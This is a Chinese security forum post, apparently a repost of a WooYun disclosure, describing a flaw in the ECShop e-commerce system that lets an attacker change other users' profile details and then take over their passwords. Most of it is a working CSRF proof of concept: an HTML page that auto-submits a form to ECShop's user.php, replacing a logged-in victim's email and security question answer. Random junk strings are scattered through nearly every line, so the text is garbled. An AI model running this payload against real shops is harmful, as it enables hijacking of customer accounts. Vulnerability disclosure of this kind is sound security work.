找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2050|回复: 0
打印 上一主题 下一主题

ecshop修改任意用户密码漏洞的CSRF利用

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-20 08:30:14 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
简要描述:
2 [+ K0 z: @  }  Q2 w. Q2 Cecshop在设计认证机制的时候存在一个问题,导致恶意用户可以窃取其他用户的密码,这个过程可以通过xss和csrf实现
3 O8 f$ [0 I% \1 W/ n9 W; Q8 |" O; h1 m- f" q6 f& C- p
Demo For:http://www.wooyun.org/bug.php?action=view&id=395
/ {6 n; m. n% v" H+ s2 ~
' N/ w9 {6 L: h# C/ N详细说明:
2 y3 S) b$ m( U" ^6 k7 X利用csrf和xss可以突破官方所说的“障碍”' \/ k: w# n% w) B5 r
xss版本已经有人说明. y( f( k% n* r" X+ p
这里给出csrf版本: a* S2 F5 N; C

$ c' K- z) j$ ^% n0 ~漏洞证明:) a, E9 ^* G+ J7 E! t( N
<html>
' k3 P- X3 O* |# ^5 q<body>
: L+ E  C, {! m8 T; w' u<form action="http://www.wooyun.org/ecshop/user.php" method="POST">! N* r+ E% u' u$ r' l8 ~
<INPUT TYPE="text" NAME="email" value="hack@wooyun.org">
* a7 l- J  A& w; H0 ~<INPUT TYPE="text" NAME="act" value="act_edit_profile">
7 g( R% I( Y# H2 c$ ~5 |<INPUT TYPE="text" NAME="sel_question" value="ecshop">
, I" S5 H  U! }# ]2 s+ a9 i<INPUT TYPE="text" NAME="passwd_answer" value="exploit">
5 e& p9 Y5 n! t</body>( w6 |( g- T$ k7 h3 F
<script>
' f8 L0 ]$ i+ W# o+ ?document.forms[0].submit();- I% F; b- p* n; Y
</script>
! O; }+ A0 U4 V' f/ l2 |</html>: H- a5 O( l' w. V& f  Z. Y
构造该网页,用户在登录情况下访问该网页将导致email以及一些其他安全信息丢失
5 ^# ?- @  M: c1 W9 y+ h9 S# {# u2 [# i1 n. j: A$ M% K
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表